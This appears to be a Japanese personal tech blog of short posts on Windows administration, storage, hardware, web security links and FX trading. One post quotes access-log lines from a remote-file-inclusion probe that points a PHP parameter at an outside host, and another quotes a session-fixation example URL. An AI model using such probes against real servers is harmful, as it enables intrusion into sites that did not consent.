バルクの HDD に USB ケーブル繋げただけのやつ・・・  抜き差しをしなければ問題無いと思いますが、重要なデータは USB HDD に保存しない方が良いですよ。。。  マウントに失敗してデータが吹き飛びました。ファイナルデータで救済も 1 件も HIT せず。orz  フォーマットがダイナミックだったのが悪いのか USB が悪いのか、HDD につけてるケーブルが粗悪なのか  判りませんけど、、、  後から聞いた話ですが、そうなった場合でも諦めずに Windows 2000 で繋ぐと見れるらしい。。。  【インタビュー】クリエイターに最適なハードディスクを考えるウエスタンデジタル社長に聞く  http://journal.mycom.co.jp/articles/2007/06/29/hdd/  ハードディスクそのもののデータは守れないか  http://www.nikkeibp.co.jp/sj/special/199/index.html?cd=sjm  断片化を爆速で処理する無料デフラグソフト「Auslogics Disk Defrag」  http://gigazine.net/index.php?/news/comments/20070619_auslogics_disk_defrag/  Samsung、1.8インチ 64GB ソリッドステートドライブの量産を開始  http://journal.mycom.co.jp/news/2007/06/26/002/  Seagate、1テラバイトHDDを発表  http://www.itmedia.co.jp/enterprise/articles/0706/26/news048.html
サポートに問い合わせた時のメールに担当者の名前が書かれてない時。  ちょっと気になったので。  こっちが名乗っているのに名乗らないのは、自分の発言に責任を持ちたくないのかな〜っと  想像して余り良い印象を与えないと思うんですけど…  みなさんは、どう思います?  冷やかしとかが多く 2ch や Blog で晒されたりしたくない、って所なんでしょうけど。。。  メール送る時は、担当者名くらい書くのが筋って事で。  実録・ネットで叩かれたときの対処法!(ココロ社)  http://d.hatena.ne.jp/kokorosha/20070627#p1  ネットでの「祭り」を取材して=岩佐淳士(社会部)−記者の目  http://www.mainichi-msn.co.jp/eye/kishanome/news/20070628ddm004070092000c.html
EZwebサイトでSession Fixation被害発生か? http://takagi-hiromitsu.jp/diary/20070629.html#p01 |いくつかのサーバ(たとえばJRun)は、URLに書かれた任意のセッションIDを |受け入れ、それをcookieとしてブラウザに発行し返す。たとえば、 | http://online.worldbank.dom/?jsessionid=1234 |というリクエストを出すことは、セッションcookie「JSESSIONID」を「1234」 |にセットし、そのサーバにそのIDで新たなセッションを作成する。 | |この脆弱性を持つWebアプリサーバとしてはPHPが最も有名であり、PHPセキュリティ界隈 |では「session.use_only_cookies をオンに設定する」ことが鉄則として叫ばれている。 |しかし、PHPだけでなく、上の文献にも書かれているように、J2EEのWebアプリサーバにも |同様の挙動をするものがあるらしい*3。 へー。 たまに HTML の後ろに変なパラメータ付いたアクセスが在ったりしますねぇ。。。 なぜPHPアプリにセキュリティホールが多いのか?  第11回 スクリプトインジェクションを防ぐ10のTips http://gihyo.jp/dev/serial/01/php-security/0011 XSSを削除し、非推奨の要素を変換! - HTMLフィルタ「HTML Purifier 2.0」 http://journal.mycom.co.jp/news/2007/06/22/019/ 新版の「セキュア・プログラミング講座」 http://www.ipa.go.jp/security/awareness/vendor/programmingv2/web.html JPCERT マルウェア、及びボットネットの研究資料各種を公開 http://www.jpcert.or.jp/research/index.html#botnet 葉っぱ日記 http://d.hatena.ne.jp/hasegawayosuke/20070627/p1  ここが危ない!Web2.0のセキュリティ: 第1回 Ajaxとクロスサイトスクリプティング  http://gihyo.jp/dev/serial/01/web20sec/0001?page=1 IE7のセキュリティ機能の実力を知る http://www.nikkeibp.co.jp/news/it07q2/538067/ (1)ActiveXコントロールの実行をオフにする (2)「拡張子ではなく,内容で開く」を無効化する (3)「常に新しいタブでポップアップを開く」に設定する 後は ・VirtualPC 内でネットサーフィンする ・マカフィ サイトアドバイザーも試してみる
日本HP,期間限定でサーバー機を1万円台で販売 http://itpro.nikkeibp.co.jp/article/NEWS/20070628/276187/ やす… HP は PCIe x16 が付いていますし、お買い得かも。(DELL は PCIe x8 しか付いていません)  日本HP - ホップ・ステップ・ジャンプ キャンペーン  http://h50146.www5.hp.com/products/servers/proliant/campaign/hopstep.html  |ご好評をいただいている『ホップ・ステップ・ジャンプキャンペーン』が、さらにお得になりました。  |2007年9月27日(木)までの期間限定で、HP ProLiant ML100シリーズがモデルによって税抜き価格から  |なんと2万円〜5万円 OFF!!しかも全モデルともHDD標準搭載です!  |たとえば、HP ProLiant ML115がProLiantサーバ史上最安値の \18,900(税込)〜となります!! ウィキペディア http://ja.wikipedia.org/wiki/Intel_Core_2 によると Athlon 64 X2 5000+(2.6GHz)と Core 2 Duo E6600(2.4GHz) Athlon 64 X2 4200+(2.2GHz)と Core 2 Duo E6300(1.86GHz) 辺りが同等性能っぽいですね。 AMD にも資料がありました。 http://www.amd.com/us-en/assets/content_type/DownloadableAssets/AMD_v_Intel_Performance_Comp_Q2-2006.pdf 一番安い AMD Athlon 64 プロセッサ 3500+ (2.2GHz、512KB L2) でも、PentiumD 930(3.0GHz)より速いようです。 仮想化技術である AMD-V は、Athlon が非対応っぽいので 購入する場合は Opteron プロセッサを選択する事になるかな?  AMD Virtualizationについて  http://www.amd.com/jp-ja/Processors/ProductInformation/0,,30_118_8796_14287,00.html  【対抗デモ第4弾】Athlon 64 X2 5600+ vs Core 2 Duo E6600 [coneco.net]  http://www.coneco.net/akibacheck/006/
SSD SSDへの期待と課題 http://pc.watch.impress.co.jp/docs/2007/0521/hot487.htm SSDをデスクトップPCで使ってみる http://www.watch.impress.co.jp/akiba/hotline/20070623/sp_ssd.html ・書き換え可能回数がある ・書き込みが遅い 3.5インチの起動用に使うメリットは少ないっぽい… これなら買える!32GBで1万5000円のSSDをテスト http://pc.nikkeibp.co.jp/article/news/20080903/1007682/ Intel純正SSDは本当にバカッ速なのか!? 「Intel X25-M」速報プレビュー http://journal.mycom.co.jp/articles/2008/09/09/x25m/index.html 転送速度はHDDの20倍、今までの常識を覆す速度のSSDが登場へ http://gigazine.net/index.php?/news/comments/20081007_fusion_io/ Windows Vista ベースまたは Windows Server 2008 ベースのコンピュータ アクセス固体ドライブ (SSD) ディスクがコンピュータにインストールされていると、パフォーマンスの低下が発生します。 http://support.microsoft.com/kb/960735/ OS を乗せかえる機会があり、ついでに SSD にしてみました。 これは、いいですねぇ・・・ Windows の再起動が10秒ぐらいですよ。。。 起動ドライブは容量少なくていいでしょうから興味がある人は換装してみては? 仮想化(VHD ファイル)を置くのも良いかも。 クラウドを加速させるSSD技術(前編)(1/2) − @IT http://www.atmarkit.co.jp/fnetwork/tokusyuu/66ssd01/01.html クラウドを加速させるSSD技術(後編)(1/2) − @IT http://www.atmarkit.co.jp/fnetwork/tokusyuu/70ssd02/01.html SSDメモリーとシステムが不適合 JR九州輸送障害 (朝日新聞デジタル) - Yahoo!ニュース http://headlines.yahoo.co.jp/hl?a=20130723-00000013-asahi-soci そろそろこういった事例が出始める時期ですかね・・・
PCI覚え書き カード 32bitPCI ┗━┛┗━━━━┛┗━┛ 3.3V、5V両方対応 ┗━━━━━━━┛┗━┛ 5V専用 ┗━┛┗━━━━━━━┛ 3.3V専用 64bitPCI ┗━┛┗━━━━┛┗━┛┗━━━━┛ 3.3V、5V両方対応 ┗━━━━━━━┛┗━┛┗━━━━┛ 5V専用 ┗━┛┗━━━━━━━┛┗━━━━┛ 3.3V専用 スロット 32bitPCI ┏━━━━━━━━━━┓3.3V、5V両方対応 ┗━━━━━━━━━━┛ ┏━━━━━━━┳━━┓5V専用 ┗━━━━━━━┻━━┛ ┏━━┳━━━━━━━┓3.3V専用 ┗━━┻━━━━━━━┛ 64bitPCI ┏━━━━━━━━━━┳━━━━━┓3.3V、5V両方対応 ┗━━━━━━━━━━┻━━━━━┛ ┏━━━━━━━┳━━┳━━━━━┓5V専用 ┗━━━━━━━┻━━┻━━━━━┛ ┏━━┳━━━━━━━┳━━━━━┓3.3V専用 ┗━━┻━━━━━━━┻━━━━━┛ 便利そうだったので、2ch から頂戴してきた。
/default.asp/link_php=http:/www.fattyisjunk.com/sohoadmin/client_files/shopping_cart/canboy1 /default.asp/forum_php=http:/www.fattyisjunk.com/sohoadmin/client_files/shopping_cart/canboy1 何ですか、このへんなアクセスログは... ついでだから、デフォルトの 404 ページを変更しておく。 もう少しヒネリが欲しい所だけどw google で簡単に作れるみたいですね。  効果的な404ページを自動生成してくれるGoogleの『Custom 404 pages』  http://www.ideaxidea.com/archives/2008/09/404googlecustom_404_pages.html
地上デジタル ナナオの 24 インチのモニターを購入して作業環境が改善された。 1920x1200 はかなり快適。 が、PC が壊れそう。。。マザーのコンデンサが膨らんでたり、なんか液漏れてる… 地デジ番組の「コピーワンス」規制に抜け道 http://www.yomiuri.co.jp/net/frompc/20070705nt0c.htm デジタル放送番組、コピー9回までOK…総務省が要請へ http://www.yomiuri.co.jp/atmoney/news/20070707it01.htm 【番外編】コピー9回……果たして多いのか少ないのか?  http://arena.nikkeibp.co.jp/article/column/20070720/1001663/?mail=npc 「1世代コピー9th」では誰も幸せになれない (1/3) http://plusd.itmedia.co.jp/lifestyle/articles/0707/23/news009.html なんとも中途半端な… PC で録画するユーザは海外のキャプチャカード使ってるんじゃないの? という気がしないでもない。 画質安定装置 ってものあるのでアナログな HDD レコーダも大丈夫。(何が?) 「ダビング10」への対処方法は? http://pc.nikkeibp.co.jp/article/knowhow/20091028/1019944/?set=ml どうやら PC が壊れた場合、今まで録り溜めした物は全て見れなくなるそうです・・・ BIOS のアップデートでも見れなくなったとかなんとか、、、
MS07-040(KB928365)が適用出来ない…  どうやら、CD(DVD) のドライブパスの問題らしい。  Windows 2000、Windows Server 2003 および Windows XP 用 .NET Framework 2.0 System.Web.dll および Mscoree.dll セキュリティ更新プログラム  http://www.microsoft.com/downloads/details.aspx?FamilyId=BA3CEB78-8E1B-4C38-ADFD-E8BC95AE548D&displaylang=ja  Windows Server 2003 x64 Edition を実行しているコンピュータに .NET Framework 2.0 用のセキュリティ更新プログラムをインストールするときに、エラー メッセージ "Error 1324. フォルダ パス 'Program Files' に使用できない文字が含まれています" が表示される  http://support.microsoft.com/kb/923101  もしくは  Windows Installer CleanUp ユーティリティを使って .NET Framework の構成情報を全て削除後、再インストール。
ソフトウェアレイド5 設定ミスって解除しちゃった。 これ、データの救済出来ないんですよね。トホホ 誤って解除した時の再アクティブ化する救済処置がほしいです! と言うことで、何処に保存していようが消える時は消えちゃいますので 新しいサービスとして共有同期でみんなで保管で分散化を・・・ レイドみないなイメージをネットワークで。 SNS 等で知り合いの PC へ保管させてもらえば結構便利な気がする。 もちろん、マスターは自分で保管。 っていうサービスを何処か始めて下さい・・・ また、やってもた。。。 パッチ適用後に、再起動処理でシャットダウンしない(30分待っても) 強制リセットしてやったら、ソフトウェアレイドのドライブの共有設定が消えた! DFS の構成も、、、 共有フォルダ再構成しなおした。 DFS はアクセス権を振りなおしてからサービス再起動で復活。 net stop dfs & net start dfs MS のソフトウェアレイド微妙すぎる。
Windows Vista の ユーザー アカウント コントロール をすると、 プログラムがネットワークの一部の場所にアクセスすることができません。 http://support.microsoft.com/kb/937624/ja HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 値の名前 : EnableLinkedConnections データ型 : REG_DWORD 値 : 1 ※値の作成後に有効になるので再起動は不要 現象再現  1. 管理者でログイン  2. コマンドから net use x:\\<サーバ>\<共有名> でマッピング  3. メモ帳を右クリックの「管理者として実行」から開く  4. ファイル>開く で、x ドライブを参照... 存在しない。   UAC が ON の場合デスクトップセッションが「一般ユーザ用」「管理者用」の 2 つのデスクトップが   存在する事になり Administrator 権限が付いたユーザでも通常時は Users グループと同等の   権利、権限しか与えられない為にこういった現象が発生するらしい。。。
OpenID 将来、メルマガとかの登録は統一される?  OpenIDの仕様と技術  http://www.atmarkit.co.jp/fsecurity/rensai/openid01/openid01.html  第4回 OpenIDをとりまくセキュリティ上の脅威とその対策  http://www.atmarkit.co.jp/fsecurity/rensai/openid04/openid01.html  最新仕様「OpenID 2.0」が公開  http://www.atmarkit.co.jp/news/200712/06/openid.html  OpenIDとは  http://openid.yahoo.co.jp/  OpenIDに関する調査--OpenIDの利用率はわずか1.2%  http://japan.cnet.com/research/column/webreport/story/0,3800075674,20369375,00.htm Windows Live ID、OpenID対応へ http://digitallife.jp.msn.com/article/article.aspx/genreid=102/articleid=354370/ Google,MSに続きOpenIDアカウントの提供を開始 http://itpro.nikkeibp.co.jp/article/NEWS/20081030/318117/ OpenIDファウンデーション・ジャパンが発足 - 国内企業32社が参加 http://journal.mycom.co.jp/news/2008/10/30/052/ どこもかしもも OpenID ですか。 情報が漏れた際の被害が大変な事にならないかい? クレジットカードや銀行口座を扱うサイトで採用されたら嫌だなぁ… PCサイトからiモードサイトへの導線を短くしたい――docomo IDの狙い http://plusd.itmedia.co.jp/mobile/articles/1003/11/news021.html  docomo ID認証 インターフェース仕様書  https://i.mydocomo.com/docomoid/binary/pdf/docomoIDAuthenticationInterfaceManual-public.pdf
Windows Vista のエフェメラルポートを一時的に変更する。 netsh interface ipv4 set DynamicPortRangeProtocol=tcp StartPort=1024 NumberOfPorts=5000 Store=active Windows Vista のエフェメラルポート(デフォルト 49152-65535)を 一時的に、1024-5000 に変更 ※ Store=persistent とすると再起動しても設定が保持されるが、インターネット標準の厳格な仕様から外れる。  RPC で特定のポートが使用されるように構成する方法、および IPSec を使用してそれらのポートをセキュリティで保護する方法  http://support.microsoft.com/kb/908472/ja  Windows ベースのコンピュータでの TCP ネットワーク ポートへバインドするのを試みるプログラムを使用すると、 Winsock エラー メッセージ:「 WSAEADDRINUSE(10048)」  http://support.microsoft.com/kb/943710/ja ついでに、telnet を使う場合は  コントロールパネル   >プログラム    >プログラムと機能     >Windowsの機能の有効化または無効化  から「Telnet クライアント」のチェックを入れる。   VistaでTelnetクライアントを利用する   http://www.atmarkit.co.jp/fwin2k/win2ktips/960vistelnet/vistelnet.html
第3回 脆弱なホストを狙った不正中継を見抜く http://www.atmarkit.co.jp/fsecurity/rensai/handling03/handling01.html |ここ数年はHTTP CONNECTメソッドを用いて、スパムなどのSMTPメール |を送るという不正中継の通信もよく目にするようになった。 | |「HTTPなのにSMTPの通信?」と思われるかもしれないが、 |HTTP/1.1(RFC 2616)のCONNECTメソッドを用いることで、 |SMTPに限らずTCPの通信をトンネリングさせることができる。 Web サーバへ SMTP のアラートが大量に上がって ずっと不思議に思ってたんですが、こういう事だったんですね・・・
Internet Explorer の印刷でヘッダやフッタをカスタマイズ 文字 印刷する内容 &w  ウィンドウ タイトル &u  ページのアドレス (URL) &d  短い形式の日付 (コントロール パネルの [地域と言語のオプション] で指定する形式) &D  長い形式の日付 (コントロール パネルの [地域と言語のオプション] で指定する形式) &t  時刻 (コントロール パネルの [地域と言語のオプション] で指定する形式) &T  24 時間形式の時刻 &p  現在のページ番号 &P  総ページ数 &b  右揃えの文字列 (&b に続けて文字列を入力) &b&b 中央揃えの文字列 (&b と &b の間に文字列を入力) &&  アンパサンド (&を表示) スプリクトから操作出来ないのね・・・ 日本HP、IE/FirefoxでWebページを無駄なく印刷「HP Smart Web Printing」v4.0 http://www.forest.impress.co.jp/article/2008/05/22/hpsmartwebprinting.html
「今最も検索されるキーワードは何?」、ヤフーが新サービス開始 http://pc.nikkeibp.co.jp/article/NEWS/20071112/286955/ サイトエクスプローラー(サイト管理者向けツール) http://siteexplorer.search.yahoo.co.jp/ だれでもWikiサイトを構築できる「Google Sites」が正式提供 http://japan.cnet.com/news/media/story/0,2000056023,20373802,00.htm どの都道府県から人が見に来るかがアクセス解析できる「ジオターゲティングブログパーツ」 http://gigazine.net/index.php?/news/comments/20080529_geotargeting/  IPアドレスから住所を割り出して地図表示するサービスいろいろ  http://gigazine.net/index.php?/news/comments/20070413_myipaddress/  相手のビルの衛星写真がわかる無料アクセス解析「なかのひと ベータ版」  http://gigazine.net/index.php?/news/comments/20070418_nakanohito/ サイトアクセス者の位置情報を取得するGeoIP http://sourceforge.jp/magazine/07/07/17/0047254  GeoIPの利用方法  http://flatray.com/geoip/ IPアドレスから住所を特定してGoogleマップで表示するフリーソフト「IP Locator」 http://gigazine.net/news/20110126_ip_locator/
FX 始めようと思って、銀行口座を作ってきた。 お金は銀行に預けるな。って事で… 引き寄せの法則 お金は銀行に預けるな ってのを買って読んだ。どちらも読んで損は無いかと。 技術者さんは「原因」と「結果」の法則の方が気になるかも。 FX って呪文が唱えれるようになりました。 MP(マネーポイント)が足りないようなので経験値を稼ぎます。福沢さんに頑張ってもらわねば。 MP20 にて 2007.12.6 から開始。 2 日しか経ってないけど、攻略方法見つけた予感… 現時点では「なんでみんなやらないの?」って感じ。 このサイトを見に来るような技術者さんなら利益でますよきっと。。。 興味が出た人は知り合いのアフリエイトから申し込んであげて下さい… 種24万スレ過去ログ倉庫 - www.r-side.jp 2007.12.10 で +60K 調子こいて買いポジ 3 つ入れたら、全て敵だった。 3 体から痛恨の 1 撃もらってるが、まだなんとか力の盾で耐えてる状態。 力尽きるのも時間の問題か、、、 法令遵守がコンプライアンスではない 〜 パロマ事件の教訓 http://www.nikkeibp.co.jp/sj/2/special/176/index5.html -180K のダメージを受けて、風前の灯火だったが ホイミでなんとか回復。 痛感した。。。 あと、負のスパイラルに入ると自分の希望が前面にでちゃうので なかなか抜け出せなくなります。 始めると必ず損しますので、それは勉強代です。 2008年のドル円相場の予想。(責任は持てません) サブプライムの影響は予想以上で、基本円高。 ピークで 98円、 上げて 110円。 105円水準で動くんじゃないかと。 98円代は今年前半。後半から戻すんじゃないかと。。。 2009年予想。(責任は持てません) 今の日本に投資する魅力が無い事に気付き、政府が重い腰をあげる。 オリンピック以降の中国の成長が驚異的で、日本が政府系ファンドを作りスーパーセブンの仲間入なるか。 金利を引き上げて、アジアの主要通貨を目指す方針転換。 集中的に流れ込んでいる中国やロシアへの投資を日本の株に向けさせる。 ゆとり教育の過ちに気付いて、資産運用も勉強の一環に盛り込まれる。 ずばり、95円に向かう方向に流れる。 アメリカは、金融機関が見境なしに資金注入を受けたおかげで、敵対国である中国やロシアに 経済をコントロールされる懸念が高まり、事態は収まらない。 補足  日本もその事に気付いてるはずだが危機管理能力が低すぎるので  中国の政府系ファンドに機械産業乗っ取られ技術が全て持っていかれてから  慌てて対策に出るかもしれません。  が、そうなってからでは投資する価値も無いアジアの一つになっているでしょう。 FX(外国為替証拠金取引)被害、大々的に報道〜この記事をどんどん転載して広告掲載責任を問おう! http://blog.goo.ne.jp/tokyodo-2005/e/8a270c0567191c9b5a870d88df25b26d 突然の事業休止、業界に淘汰の波到来か 過剰サービスで自滅するFX業者 http://moneyzine.jp/article/detail/92459 2008.10.4 概ね予想通りの展開になりつつありますが、何故かモリモリ資産が減少しています。orz 効率的な投資先は自分自身という事で。 皆さん、未来の自分に投資しましょう… もっとも経済情報を見る機会は増えますので悪い事ばかりでは在りませんが。 数枚の「同一番号」中国人民元。これがなんと「本物」鑑定という、「とてつもない闇」の入り口を覗き見た http://www.nikkeibp.co.jp/article/sj/20091204/199237/?P=1 元が基軸通貨になることは当分なさそうですね・・・ 株を担保にお金を融資してくれる会社 http://web.osfnet.com/ 融資不適格銘柄を掲載している。 んー、FX は自分には向いてない事がよくわかった。 集団心理よる暴走で経済混乱だけで済めば良いが...
パーソナライズ機能で特定のプログラムを一覧に表示しないようにする。 HKEY_CLASSES_ROOT\Applications\<アプリケーション名.exe>\ 値の名前 : NoStartPage データ型 : REG_SZ 値 : ※値は空白で OK   機能そのものを無効にするには、スタートを右クリックしてプロパティを開き   カスタマイズのスタートメニューに表示するプログラム数を 0 にする。
NTFS のアクセス権を初期値に戻す。 MMC を起動してスナップインの追加と削除を選択し「スタンドアロン」から追加をクリック 「利用できるスタンドアロンスナップイン」から「セキュリティの構成と分析」を選択して追加をクリック 左ペインで「\コンソールルート\セキュリティの構成と分析」を右クリックして「データベースを開く」をクリック 復元したいセキュリティデーターベースファイル(.sdb)を選択して開くをクリック 左ペインで「\コンソールルート\セキュリティの構成と分析」を右クリックして「テンプレートのインポート」をクリック %SystemRoot%\inf\defltdc.inf(ドメインコントローラ) %SystemRoot%\inf\defltsv.inf(サーバー) %SystemRoot%\inf\defltwk.inf(クライント) のいずれかのファイルを選択して開くをクリック(隠しフォルダになっている場合があります) これで既定値に戻る。 関連  Xcacls.vbs を使用して NTFS アクセス許可を変更する方法  http://support.microsoft.com/kb/825751/ja  caclsコマンドでACLを編集する(SDDL編)  http://www.atmarkit.co.jp/fwin2k/win2ktips/726caclssddl/caclssddl.html   コマンドライン・ツール http://www.atmarkit.co.jp/fwin2k/win2ktips/index/tipsdir/dir27000199.html
プロバイダの登録情報の確認 パスワード忘れてログインできねぇ… で、ルータに設定してたの思い出して INPUT 項目の パスワードを表示してる画面のソースを確認して判明。 在りがたかったが、それで良いんだろうか…
消費生活相談にみる2007年の10大項目   1.外国語学校、契約解約トラブル相次ぐ   2.食品の偽装が次々と明るみに   3.怪しい「出資」の被害、広がる   4.製品関連事故の多様化と対策強化   5.施設・設備に関連する重大事故相次ぐ   6.悪質商法に対する行政処分や摘発が相次ぐなか、特商法、割販法の改正論議進む   7.多重債務問題への対応進む   8.金融商品取引法施行、事業者の説明責任明確に   9.消費者団体訴訟制度スタート  10.「消費者トラブルメール箱」の受信件数増加  消費生活相談にみる2007年の10大項目  http://www.kokusen.go.jp/news/data/n-20071207_3.html
VISTA 対応のアプリケーション マニフェスト(.manifest) 実行ファイル名.exe.manifest (実行ファイルと同じ所へ置く) <?xml version="1.0" encoding="utf-8" standalone="yes"?>  <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">  <assemblyIdentity   version="1.0.0.0"   processorArchitecture="X86"   name="実行ファイル名(.exe は除く)"   type="win32"  />  <description>Description of your application</description>  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">   <security>    <requestedPrivileges>     <requestedExecutionLevel level="RequireAdministrator" uiAccess="false" />    </requestedPrivileges>   </security>  </trustInfo> </assembly> ※ UTF-8 で保存すること。 <requestedExecutionLevel level="asInvoker|highestAvailable|requireAdministrator" uiAccess="true|false"/> という指定で、このアプリケーションの実行時に管理者権限で起動するようになります。 昇格をするためには、コードに対する署名が必要かもしれません。(x64 だけ?) level asInvoker  親プロセスと同じトークンで実行します。 highestAvailable  使用可能な最も高いレベルの特権を要求します。 requireAdministrator  管理者レベルの特権を要求します。 uiAccess false  基本はこっちで。 true  別のウィンドウの UI に入力を送信する必要があるアプリケーション Windows Vista および Windows Server 2008 アプリケーション互換性解説書 http://www.microsoft.com/japan/msdn/windowsvista/general/AppComp.aspx 最小限の特権 アプリケーションで Windows Vista のユーザー アカウント制御を有効に活用する http://msdn.microsoft.com/msdnmag/issues/07/01/UAC/default.aspx?loc=jp ユーザー アカウント制御 http://www.microsoft.com/japan/technet/windowsvista/security/uac.mspx ユーザー アカウント制御の概要 http://www.microsoft.com/japan/technet/windowsvista/security/uacppr.mspx Windows Vista ユーザー エクスペリエンス http://www.microsoft.com/japan/msdn/windowsvista/building/ux/ セキュリティ http://www.microsoft.com/japan/msdn/windowsvista/security/ Windows ロゴ プログラム http://www.microsoft.com/japan/whdc/winlogo/default.mspx Visual Studio でのマニフェスト生成 http://msdn2.microsoft.com/ja-jp/library/ms235229(VS.80).aspx マニフェスト・ファイルをアプリケーションに組み込むには?(VS.NET) http://www.atmarkit.co.jp/fdotnet/dotnettips/235embmanifest/embmanifest.html 「攻撃可能なポイントを最小限に」−−Service Hardening http://itpro.nikkeibp.co.jp/article/COLUMN/20071212/289308/
.dbx ファイルの最大ファイルは 2GB ですよ。 Outlook Express で使用される .dbx ファイルの最大ファイル サイズに関する情報 http://support.microsoft.com/kb/903095/ja 旧いアイテムはときどき整理しましょう... Thunderbird2 http://www.mozilla-japan.org/products/firefox/ は 4GB までみたい。 IMAP を利用している場合だけかもしれませんが、最後まで読めないメールがありますね。 Windows Live mail http://get.live.com/wlmail/overview は不明。 また、Windows Live mail は Windows XP SP2 にて、サブジェクトに「【重要】」と含まれている メールを受信すると、そのまま何事も無かったかのように削除するみたい・・・うちだけ? いつからそうなのか知りませんけど、Outlook Express で、本文に URL 1 行のみ書いたメールを受け取ると URL 以外の部分でもクリック出来てしまいますね。改行を入れると再現されないから、たぶんバグ (正確には URL の書かれている下のエリア全てでクリック可能。) Thunderbird は IMAP を使った場合に、受信したメールの本文が途切れてたり…
Vista に Office 2000 を入れた場合は、パッチは手動です。 Office を更新する [STEP 1] http://office.microsoft.com/ja-jp/downloads/FX101870901041.aspx Office 製品のプロダクト サポート ライフサイクル http://www.microsoft.com/japan/office/previous/2003/business/lifecycle.mspx
Windows インストーラアプリケーション(*.msi)をインストール後に セーフモードからアンインストールするには HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal 値の名前: MSIServer 値: Service   XP 以降の場合は REG.exe コマンドを利用して追加可能。   REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer /ve /d Service   ※セーフモードでは、MSIServer サービスが開始されないので   (サービスからの開始は禁止されていますので機能しません)    可能にするにはレジストリキーに追加する必要あり。
-------------------- 種類 警告 ID 2001 ソース PerfDisk 説明 システムからディスク パフォーマンス情報を読み取れません。 カウンタを表示するには、最低 1 つのディスクまたは論理ボリュームの パフォーマンス カウンタが有効になっている必要があります。 ディスク パフォーマンス カウンタは、[ハードウェア デバイス マネージャ] の プロパティ ページから有効にすることができます。 戻された状態コードはデータ DWORD 0 です。 -------------------- どうやら、Windows 2000 で USB Memory を使うとタイミングによっては その後、イベントログに大量に毎日吐き出すようです。 このイベントを止めるには、再起動するしかないみたい。  件名:突然 W2kSrv で ID2001 DiskPerf 警告イベントが多発  http://www.atmarkit.co.jp/bbs/phpBB/viewtopic.php?topic=34572&forum=6&3
HTML5 HTML 5 における HTML 4 からの変更点 http://standards.mitsue.co.jp/resources/w3c/TR/2008/WD-html5-diff-20080122/ HTML5が持つ本当の意味 http://www.atmarkit.co.jp/news/200801/25/html.html HTML5はFlashやSilverlightを不要なものにする http://www.atmarkit.co.jp/fwcr/design/benkyo/html5_03/02.html
XP SP3 色々トラブルがあるようで。。。 Windows XP SP3 をインストールした後、Windows Update、Microsoft Update、または自動更新で更新プログラムが正常にインストールされない http://support.microsoft.com/kb/953541 Windows XP Service Pack 3 のインストール後、再起動するたびにエラー メッセージ "プロシージャ エントリ ポイント apsSearchInterface がダイナミック リンク ライブラリ wlanapi.dll から見つかりませんでした" が表示される http://support.microsoft.com/kb/950720/ja Intel のプロセッサ以外のコンピュータをWindows XP Service Pack もしくはService Pack 3 にアップグレート後、STOP 0x0000007E エラーメッセージが表示される。 http://support.microsoft.com/kb/888372/ シマンテック、Windows XP SP3導入時トラブルの回避策を説明 「SymProtect」の無効化の呼びかけと、不正なレジストリを削除するツールを準備中 http://www.computerworld.jp/topics/os/109889.html  Windows XP SP3のレジストリ破損問題、マイクロソフト作成のexeファイルが原因  http://www.computerworld.jp/topics/ms/109390.html Windows XP SP3の不具合、今度はリモート・アクセス機能で発覚 http://www.computerworld.jp/topics/ms/108369.html なんじゃこりゃー、stop:C0000139 unknown Hard Error http://blogs.yahoo.co.jp/omyasanoi/20310264.html MSがアップデートで勧告:Windows XP SP3導入でFlash Playerが脆弱に? http://www.itmedia.co.jp/enterprise/articles/0806/03/news023.html VISTA SP1 入れてからだったか覚えがないんですけど、USB マウスの動きが変に・・・ 最近特に酷くて、左端に飛ぶんですよね、、、IME 以上に性質が悪い。 マウスを変えても症状が改善されませんでしたので USB のポートなのか、OS なのか。。。
ドコモのメールアドレス 本来、メールアドレスに使ってはいけない約束事(RFC準拠)を破ってる訳ですが ドットを連続で入れたり、@の前にドットが有ったり、、、 一般のメールサーバからは、そういったアドレスへはメールは出せ無い訳ですが ダブルクォートで括ると、出せたりします。 で、不思議なのがアドレスの最後にダブルクォートを付けても届く... たとえば、 x@docomo.ne.jp を x"@docomo.ne.jp としても届いちゃいます。 (さらに複数増やした場合とかは調べてないですけども) そーゆーもん?  メール アドレスの @ より前にピリオドがあるなど RFC に準拠していない宛先に Outlook からメッセージを送信できない  http://support.microsoft.com/kb/940620/ja  NTTドコモ、iモードメールをPCで送受信できる「iモード.net」  http://bb.watch.impress.co.jp/cda/news/21210.html ドコモ、メールアドレスの仕様を修正 - スラッシュドット・ジャパン http://slashdot.jp/mobile/article.pl?sid=09/04/02/2338257 ※Windows7 になって Windows Live メール を利用する場合、ダブルクォートでも送信できません。  別のメールソフトにするか、ケータイのメールアドレスを変更しましょう。
ARP Spoofing(ARPポイズニング) の対策  中国セキュリティ機関のサイト攻撃、Webホスティングサービスを悪用  http://www.itmedia.co.jp/news/articles/0710/05/news026.html  ARPスプーフィング:読者のWebホスティング・サービスは守られているか  http://itpro.nikkeibp.co.jp/article/COLUMN/20071019/284979/  HTTP応答パケットを悪用するARPスプーフィング・ウイルス  http://itpro.nikkeibp.co.jp/article/COLUMN/20080125/292050/  ネットワーク機器がホームページ改ざん幇助:ARPスプーフィングの脅威  http://blog.trendmicro.co.jp/archives/1388    ipconfig /all で、Default Gateway を確認  Default Gateway に ping を叩く  arp -a で MAC アドレス確認  arp -s で 登録しなおして、dynamic から static に変更しておく。  Windows Vista および Windows Server 2008 以降の OS で、IP アドレスの変更時に送信される ARP リクエストにより、  他の機器の ARP テーブルが更新されずに通信が失敗する  http://support.microsoft.com/kb/980424  Windows Server 2008 以降の場合は netsh を使う  例)netsh interface ipv4 add neighbor "NIC名" "192.168.1.1" "00-00-00-00-00-01"  ※注意点として、ルーターが壊れた場合に 代替機の MAC アドレスが相違している場合   外に出れなくなりますのでご注意。(意外と設定していた事を忘れて悩みます)
